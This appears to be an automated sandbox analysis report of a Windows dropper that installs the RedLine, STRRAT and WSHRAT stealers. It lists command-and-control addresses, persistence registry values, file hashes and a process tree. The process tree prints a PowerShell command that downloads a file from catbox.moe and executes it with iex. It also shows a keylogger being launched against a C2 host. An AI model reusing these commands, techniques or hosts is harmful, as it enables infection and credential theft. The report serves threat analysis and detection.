redline | f82e5e6ba614031d24cb1460149e658eb3b4b9b0372dda40989ea413feae185c

Analysis

max time kernel
149s
max time network
187s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
20-10-2022 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
Size

4.1MB
MD5

803238fd75925bebb2d385b7c472b8f7
SHA1

0f06400fd1e6e0003e90e6e289ef53b968ddb6dd
SHA256

f82e5e6ba614031d24cb1460149e658eb3b4b9b0372dda40989ea413feae185c
SHA512

ceab74a27e52e29574a14b0ca0e66cb2fae8a6e0d6bb7a8f89aa7a66d5a918ba23bf3ae73cc1e5c00bb8c031ad6465208b6d3d40c07df882a681de7b46c692f9
SSDEEP

98304:vFEn+sPuptl3GCXOStfnCKWdZkkby1/++UIAr:vREupr/XO+CDdZPby1/ZUIe

Score

10^/10

redline strrat wshrat infostealer persistence stealer trojan

Malware Config

Extracted

Family

redline

45.87.155.189:20856

Attributes

auth_value
ac64e5ead391346e804f0d9ec2f18faa

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://files.catbox.moe/3pwn9k.jpg

Extracted

Family

wshrat

http://svchost.ydns.eu:8000

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/memory/568-95-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/568-107-0x000000000041A7BE-mapping.dmp	family_redline
behavioral1/memory/568-109-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/568-110-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

STRRAT
STRRAT is a remote access tool than can steal credentials and log keystrokes.
trojan stealer strrat
WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

Blocklisted process makes network request 10 IoCs

flow	pid	Process
18	1660	powershell.exe
19	1552	WScript.exe
20	1764	WScript.exe
21	1552	WScript.exe
22	1660	powershell.exe
24	1552	WScript.exe
27	1764	WScript.exe
28	1552	WScript.exe
31	1764	WScript.exe
32	1552	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
1516	Scr.exe
1344	ONLYFANS CHECKER.exe
1508	kl-plugin.exe

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\User.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Plataform.jar	java.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EsetNod32.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EsetNod32.js	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\User.vbs	WScript.exe

Loads dropped DLL 6 IoCs

pid	Process
1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
1552	WScript.exe
984	java.exe
1312	java.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Plataform = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\Java Plataform.jar\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\EsetNod32 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\EsetNod32.js\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EsetNod32 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\EsetNod32.js\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Plataform = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\Java Plataform.jar\""	java.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\User = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\User.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\User = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\User.vbs\""	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1344 set thread context of 568	1344	ONLYFANS CHECKER.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
1488	taskkill.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	21	WSHRAT\|BC40DA2B\|GRXNNIIE\|Admin\|Microsoft Windows 7 Ultimate \|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands
HTTP User-Agent header	24	WSHRAT\|BC40DA2B\|GRXNNIIE\|Admin\|Microsoft Windows 7 Ultimate \|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands
HTTP User-Agent header	28	WSHRAT\|BC40DA2B\|GRXNNIIE\|Admin\|Microsoft Windows 7 Ultimate \|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands
HTTP User-Agent header	32	WSHRAT\|BC40DA2B\|GRXNNIIE\|Admin\|Microsoft Windows 7 Ultimate \|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1176	powershell.exe
1660	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1488	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1508	kl-plugin.exe
1508	kl-plugin.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 1552	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	27
PID 1888 wrote to memory of 1552	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	27
PID 1888 wrote to memory of 1552	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	27
PID 1888 wrote to memory of 1552	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	27
PID 1888 wrote to memory of 1240	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	28
PID 1888 wrote to memory of 1240	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	28
PID 1888 wrote to memory of 1240	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	28
PID 1888 wrote to memory of 1240	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	28
PID 1888 wrote to memory of 1516	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	29
PID 1888 wrote to memory of 1516	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	29
PID 1888 wrote to memory of 1516	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	29
PID 1888 wrote to memory of 1516	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	29
PID 1888 wrote to memory of 1760	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	30
PID 1888 wrote to memory of 1760	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	30
PID 1888 wrote to memory of 1760	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	30
PID 1888 wrote to memory of 1760	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	30
PID 1888 wrote to memory of 1344	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	31
PID 1888 wrote to memory of 1344	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	31
PID 1888 wrote to memory of 1344	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	31
PID 1888 wrote to memory of 1344	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	31
PID 1888 wrote to memory of 1764	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	32
PID 1888 wrote to memory of 1764	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	32
PID 1888 wrote to memory of 1764	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	32
PID 1888 wrote to memory of 1764	1888	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	32
PID 1760 wrote to memory of 1660	1760	WScript.exe	34
PID 1760 wrote to memory of 1660	1760	WScript.exe	34
PID 1760 wrote to memory of 1660	1760	WScript.exe	34
PID 1760 wrote to memory of 1660	1760	WScript.exe	34
PID 1516 wrote to memory of 1176	1516	Scr.exe	38
PID 1516 wrote to memory of 1176	1516	Scr.exe	38
PID 1516 wrote to memory of 1176	1516	Scr.exe	38
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1344 wrote to memory of 568	1344	ONLYFANS CHECKER.exe	37
PID 1240 wrote to memory of 984	1240	javaw.exe	42
PID 1240 wrote to memory of 984	1240	javaw.exe	42
PID 1240 wrote to memory of 984	1240	javaw.exe	42
PID 1552 wrote to memory of 1176	1552	WScript.exe	44
PID 1552 wrote to memory of 1176	1552	WScript.exe	44
PID 1552 wrote to memory of 1176	1552	WScript.exe	44
PID 1552 wrote to memory of 1176	1552	WScript.exe	44
PID 1176 wrote to memory of 1488	1176	cmd.exe	46
PID 1176 wrote to memory of 1488	1176	cmd.exe	46
PID 1176 wrote to memory of 1488	1176	cmd.exe	46
PID 1176 wrote to memory of 1488	1176	cmd.exe	46
PID 1552 wrote to memory of 1508	1552	WScript.exe	47
PID 1552 wrote to memory of 1508	1552	WScript.exe	47
PID 1552 wrote to memory of 1508	1552	WScript.exe	47
PID 1552 wrote to memory of 1508	1552	WScript.exe	47
PID 984 wrote to memory of 1312	984	java.exe	48
PID 984 wrote to memory of 1312	984	java.exe	48
PID 984 wrote to memory of 1312	984	java.exe	48

C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
"C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\EsetNod32.js"
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM kl-plugin.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1488
- - C:\Users\Admin\AppData\Roaming\kl-plugin.exe
    "C:\Users\Admin\AppData\Roaming\kl-plugin.exe" svchost.ydns.eu 8000 "WSHRAT|BC40DA2B|GRXNNIIE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 20/10/2022|JavaScript-v2.0|NL:Netherlands" 1
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1508
- C:\Program Files\Java\jre7\bin\javaw.exe
  "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Plataform.jar"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\Program Files\Java\jre7\bin\java.exe
    "C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\Java Plataform.jar"
    3⤵
    - Drops startup file
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:984
  - - C:\Program Files\Java\jre7\bin\java.exe
      "C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Plataform.jar"
      4⤵
      Loads dropped DLL
      PID:1312
- C:\Users\Admin\AppData\Roaming\Scr.exe
  "C:\Users\Admin\AppData\Roaming\Scr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -c cd $env:tmp;Invoke-WebRequest https://files.catbox.moe/9jfjbh.png -OutFile Error.png;gc Error.png | iex
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Scr.VBS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe
  "C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:568
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\User.vbs"
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Adds Run key to start application
  PID:1764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rrrrrrrr.ps1

Filesize
437B

MD5
6fb3bcb1df4238202635b791907a2cc8

SHA1
e34888df4096c91096fc76599b8586a513feca7f

SHA256
8a92dfc83aa949a737624fb844dbcf0731b7cfa5bfb8e70a105f2a2b532cc06c

SHA512
2fbc0f082e542082a4dc54d72f922fe33ff50ed549874c4b82399321546a9485b1852e225d3272e0581fec8b6d8a2f7506db2cdb196ba465a878eca396782277

Download Submit
C:\Users\Admin\AppData\Local\Temp\jna-63116079\jna4740505583871739027.dll

Filesize
241KB

MD5
e02979ecd43bcc9061eb2b494ab5af50

SHA1
3122ac0e751660f646c73b10c4f79685aa65c545

SHA256
a66959bec2ef5af730198db9f3b3f7cab0d4ae70ce01bec02bf1d738e6d1ee7a

SHA512
1e6f7dcb6a557c9b896412a48dd017c16f7a52fa2b9ab513593c9ecd118e86083979821ca7a3e2f098ee349200c823c759cec6599740dd391cb5f354dc29b372

Download Submit
C:\Users\Admin\AppData\Roaming\EsetNod32.js

Filesize
712KB

MD5
3624e469765d60dfb5ef46d96504038a

SHA1
a42a61dc4d169e4b555702a8a45e8a49fbe11beb

SHA256
4cd6701682cc75c9581d720ff4f87db4bd1a4ec8bb6775bfe0fd2d66ebeb3465

SHA512
b196618a732d840619dcc0ac45a9b7205f7ff21cdb87c18bafdb9ae28bf8d5c06b1049f9227851588897ba24e6e3922a922aa291ef6d62323ee6121019ad6fa6

Download Submit
C:\Users\Admin\AppData\Roaming\Java Plataform.jar

Filesize
92KB

MD5
0bdc00b168aca259ac2cb22226673b51

SHA1
1fbe9e133cda80479ac441b77891c9049e6e43c1

SHA256
edc82523e7ff486f9b1ce56a27dfe724262578748a60fc94305cbc158db176c3

SHA512
26d1ed2bdfe26ba44466874ebf334213a5cb2c07a7f68cdb5dfbfb092f7960c4812e223bfe53daf8ac06b34b78ac6d3d11e80c51377b6f237fbe8125ad92a104

Download Submit
C:\Users\Admin\AppData\Roaming\Java Plataform.jar

Filesize
92KB

MD5
0bdc00b168aca259ac2cb22226673b51

SHA1
1fbe9e133cda80479ac441b77891c9049e6e43c1

SHA256
edc82523e7ff486f9b1ce56a27dfe724262578748a60fc94305cbc158db176c3

SHA512
26d1ed2bdfe26ba44466874ebf334213a5cb2c07a7f68cdb5dfbfb092f7960c4812e223bfe53daf8ac06b34b78ac6d3d11e80c51377b6f237fbe8125ad92a104

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2292972927-2705560509-2768824231-1000\83aa4cc77f591dfc2374580bbd95f6ba_4339b52c-c4ea-4bc4-b41f-93efca473d02

Filesize
45B

MD5
c8366ae350e7019aefc9d1e6e6a498c6

SHA1
5731d8a3e6568a5f2dfbbc87e3db9637df280b61

SHA256
11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238

SHA512
33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

Download Submit
C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe

Filesize
3.9MB

MD5
6b62d1351a2513db98027b4ee9440a31

SHA1
7678ad8679e82c99ea35166027bb595ec8244c9e

SHA256
76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

SHA512
efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.VBS

Filesize
984B

MD5
986066708bacb494aade46fbfbe000fe

SHA1
665c06147c57d72eb6d1f2f38c6be141eb17c47e

SHA256
c581c944bf383522f361ed5695fbc9bf46476145e894c244a2fe830e8757a15f

SHA512
8ab3f43c93350642cb5b2d78e2d1f848933facd5f72f2a105b675858e72b9547291c1c5448433927f1ee859de245a9891dafbfc2de641bbacaf9e1a7b3ccc7e3

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.exe

Filesize
4KB

MD5
6f8e34106a2a024f6961b5e166dfb57b

SHA1
183cecc7f4f29304474eb629c215fe23280b4611

SHA256
06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

SHA512
7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.exe

Filesize
4KB

MD5
6f8e34106a2a024f6961b5e166dfb57b

SHA1
183cecc7f4f29304474eb629c215fe23280b4611

SHA256
06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

SHA512
7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

Download Submit
C:\Users\Admin\AppData\Roaming\User.vbs

Filesize
1.4MB

MD5
195176fece927e0f49c61aaeec356b5b

SHA1
5471ae64215ffdc266ae886bbace3b822655c339

SHA256
64399996339c31666bfd04dcaa039e509954f019f55279e4512e16626e693d1b

SHA512
73e6e383828cc9af57cc7a634b6d04c5ce720d54f64229fec1b4152c124164b2c901b7735de054069518d5faf5cd000f1dfd125412b2e41dce8540508ac84832

Download Submit
C:\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

Download Submit
C:\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

Download Submit
C:\Users\Admin\AppData\Roaming\lib\jna-5.5.0.jar

Filesize
1.4MB

MD5
acfb5b5fd9ee10bf69497792fd469f85

SHA1
0e0845217c4907822403912ad6828d8e0b256208

SHA256
b308faebfe4ed409de8410e0a632d164b2126b035f6eacff968d3908cafb4d9e

SHA512
e52575f58a195ceb3bd16b9740eadf5bc5b1d4d63c0734e8e5fd1d1776aa2d068d2e4c7173b83803f95f72c0a6759ae1c9b65773c734250d4cfcdf47a19f82aa

Download Submit
C:\Users\Admin\AppData\Roaming\lib\jna-platform-5.5.0.jar

Filesize
2.6MB

MD5
2f4a99c2758e72ee2b59a73586a2322f

SHA1
af38e7c4d0fc73c23ecd785443705bfdee5b90bf

SHA256
24d81621f82ac29fcdd9a74116031f5907a2343158e616f4573bbfa2434ae0d5

SHA512
b860459a0d3bf7ccb600a03aa1d2ac0358619ee89b2b96ed723541e182b6fdab53aefef7992acb4e03fca67aa47cbe3907b1e6060a60b57ed96c4e00c35c7494

Download Submit
C:\Users\Admin\AppData\Roaming\lib\sqlite-jdbc-3.14.2.1.jar

Filesize
4.1MB

MD5
b33387e15ab150a7bf560abdc73c3bec

SHA1
66b8075784131f578ef893fd7674273f709b9a4c

SHA256
2eae3dea1c3dde6104c49f9601074b6038ff6abcf3be23f4b56f6720a4f6a491

SHA512
25cfb0d6ce35d0bcb18527d3aa12c63ecb2d9c1b8b78805d1306e516c13480b79bb0d74730aa93bd1752f9ac2da9fdd51781c48844cea2fd52a06c62852c8279

Download Submit
C:\Users\Admin\AppData\Roaming\lib\system-hook-3.5.jar

Filesize
772KB

MD5
e1aa38a1e78a76a6de73efae136cdb3a

SHA1
c463da71871f780b2e2e5dba115d43953b537daf

SHA256
2ddda8af6faef8bde46acf43ec546603180bcf8dcb2e5591fff8ac9cd30b5609

SHA512
fee16fe9364926ec337e52f551fd62ed81984808a847de2fd68ff29b6c5da0dcc04ef6d8977f0fe675662a7d2ea1065cdcdd2a5259446226a7c7c5516bd7d60d

Download Submit
C:\Users\Admin\Java Plataform.jar

Filesize
92KB

MD5
0bdc00b168aca259ac2cb22226673b51

SHA1
1fbe9e133cda80479ac441b77891c9049e6e43c1

SHA256
edc82523e7ff486f9b1ce56a27dfe724262578748a60fc94305cbc158db176c3

SHA512
26d1ed2bdfe26ba44466874ebf334213a5cb2c07a7f68cdb5dfbfb092f7960c4812e223bfe53daf8ac06b34b78ac6d3d11e80c51377b6f237fbe8125ad92a104

Download Submit
C:\Users\Admin\lib\jna-5.5.0.jar

Filesize
1.4MB

MD5
acfb5b5fd9ee10bf69497792fd469f85

SHA1
0e0845217c4907822403912ad6828d8e0b256208

SHA256
b308faebfe4ed409de8410e0a632d164b2126b035f6eacff968d3908cafb4d9e

SHA512
e52575f58a195ceb3bd16b9740eadf5bc5b1d4d63c0734e8e5fd1d1776aa2d068d2e4c7173b83803f95f72c0a6759ae1c9b65773c734250d4cfcdf47a19f82aa

Download Submit
C:\Users\Admin\lib\jna-platform-5.5.0.jar

Filesize
2.6MB

MD5
2f4a99c2758e72ee2b59a73586a2322f

SHA1
af38e7c4d0fc73c23ecd785443705bfdee5b90bf

SHA256
24d81621f82ac29fcdd9a74116031f5907a2343158e616f4573bbfa2434ae0d5

SHA512
b860459a0d3bf7ccb600a03aa1d2ac0358619ee89b2b96ed723541e182b6fdab53aefef7992acb4e03fca67aa47cbe3907b1e6060a60b57ed96c4e00c35c7494

Download Submit
C:\Users\Admin\lib\sqlite-jdbc-3.14.2.1.jar

Filesize
4.1MB

MD5
b33387e15ab150a7bf560abdc73c3bec

SHA1
66b8075784131f578ef893fd7674273f709b9a4c

SHA256
2eae3dea1c3dde6104c49f9601074b6038ff6abcf3be23f4b56f6720a4f6a491

SHA512
25cfb0d6ce35d0bcb18527d3aa12c63ecb2d9c1b8b78805d1306e516c13480b79bb0d74730aa93bd1752f9ac2da9fdd51781c48844cea2fd52a06c62852c8279

Download Submit
C:\Users\Admin\lib\system-hook-3.5.jar

Filesize
772KB

MD5
e1aa38a1e78a76a6de73efae136cdb3a

SHA1
c463da71871f780b2e2e5dba115d43953b537daf

SHA256
2ddda8af6faef8bde46acf43ec546603180bcf8dcb2e5591fff8ac9cd30b5609

SHA512
fee16fe9364926ec337e52f551fd62ed81984808a847de2fd68ff29b6c5da0dcc04ef6d8977f0fe675662a7d2ea1065cdcdd2a5259446226a7c7c5516bd7d60d

Download Submit
\Users\Admin\AppData\Local\Temp\jna-63116079\jna3681337394319270486.dll

Filesize
241KB

MD5
e02979ecd43bcc9061eb2b494ab5af50

SHA1
3122ac0e751660f646c73b10c4f79685aa65c545

SHA256
a66959bec2ef5af730198db9f3b3f7cab0d4ae70ce01bec02bf1d738e6d1ee7a

SHA512
1e6f7dcb6a557c9b896412a48dd017c16f7a52fa2b9ab513593c9ecd118e86083979821ca7a3e2f098ee349200c823c759cec6599740dd391cb5f354dc29b372

Download Submit
\Users\Admin\AppData\Local\Temp\jna-63116079\jna4740505583871739027.dll

Filesize
241KB

MD5
e02979ecd43bcc9061eb2b494ab5af50

SHA1
3122ac0e751660f646c73b10c4f79685aa65c545

SHA256
a66959bec2ef5af730198db9f3b3f7cab0d4ae70ce01bec02bf1d738e6d1ee7a

SHA512
1e6f7dcb6a557c9b896412a48dd017c16f7a52fa2b9ab513593c9ecd118e86083979821ca7a3e2f098ee349200c823c759cec6599740dd391cb5f354dc29b372

Download Submit
\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe

Filesize
3.9MB

MD5
6b62d1351a2513db98027b4ee9440a31

SHA1
7678ad8679e82c99ea35166027bb595ec8244c9e

SHA256
76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

SHA512
efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

Download Submit
\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe

Filesize
3.9MB

MD5
6b62d1351a2513db98027b4ee9440a31

SHA1
7678ad8679e82c99ea35166027bb595ec8244c9e

SHA256
76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

SHA512
efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

Download Submit
\Users\Admin\AppData\Roaming\Scr.exe

Filesize
4KB

MD5
6f8e34106a2a024f6961b5e166dfb57b

SHA1
183cecc7f4f29304474eb629c215fe23280b4611

SHA256
06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

SHA512
7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

Download Submit
\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
